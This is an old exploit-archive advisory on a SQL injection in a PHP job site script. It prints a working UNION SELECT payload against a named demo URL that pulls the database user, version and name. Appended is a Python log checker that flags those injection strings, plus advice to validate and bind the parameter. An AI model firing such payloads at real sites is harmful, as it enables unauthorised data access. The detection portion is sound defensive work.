#########################################################
#
# Job site script Design by i-netsolution (id) SQL Injection Vulnerability
#
#########################################################
#
# Author: d3b4g
#
# Home : www.hotlism.org
#
# email: bl4ckend[at]gmail[dot]com
#
#
##########################################################
# HomE script : http://www.demo.2daytemplates.com/ijobsearch/
# Language : PHP
# Risk: High
##########################################################
#
# DorK : N/A
##########################################################

-------------------------------------------------------------
Exploit:

http://target.com/[path]view_current_job.php?jid=[sql]

demo :

http://www.demo.2daytemplates.com/ijobsearch/view_current_job.php?jid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
---------------------------------------------------------------

-----------------------------------------------------------
Greetz: Str0ke || Hotlism.org || All [[darkc0de.com]] friends
-----------------------------------------------------------
I am a Maldivian :)

# milw0rm.com [2008-11-10]
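
Added example (not part of the original advisory or the vendor's code): a Python log check that flags requests to view_current_job.php whose jid parameter is anything other than a plain unsigned integer, which is how the injection above shows up in web server logs. The Apache combined log format, the sample log lines, the function name and the assumption that a legitimate jid is always numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [10/Nov/2008:09:14:02 +0000] "GET /ijobsearch/view_current_job.php?jid=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2008:09:15:40 +0000] "GET /ijobsearch/view_current_job.php?jid=-1+union+select+1,2,3/* HTTP/1.1" 200 4817 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Nov/2008:09:15:52 +0000] "GET /ijobsearch/view_current_job.php?jid=7%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Nov/2008:09:16:03 +0000] "GET /ijobsearch/index.php?jid=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.33 - - [10/Nov/2008:09:17:11 +0000] "GET /ijobsearch/view_current_job.php HTTP/1.1" 200 298 "-" "Mozilla/5.0"
"""

# Client IP, request target (may contain raw spaces) and status code.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) '
)
# Assumption: a legitimate job id is a short unsigned integer.
JID_OK = re.compile(r"[0-9]{1,10}")

def suspicious_jid_requests(log_text, script="view_current_job.php"):
    """Return (ip, status, jid_values) for requests with a non-numeric or repeated jid."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/" + script):
            continue
        # parse_qs URL-decodes the value, so '+' and %27 are seen as ' ' and "'".
        values = parse_qs(url.query, keep_blank_values=True).get("jid", [])
        bad = [v for v in values if not JID_OK.fullmatch(v)]
        # A repeated jid is also flagged: duplicate parameters can hide a payload.
        if bad or len(values) > 1:
            findings.append((m.group("ip"), int(m.group("status")), values))
    return findings

if __name__ == "__main__":
    for ip, status, values in suspicious_jid_requests(SAMPLE_LOG):
        print(ip, status, values)
```

The same integer-only rule belongs in the application itself: validate jid before it reaches the query and bind it as a parameter rather than concatenating it into SQL.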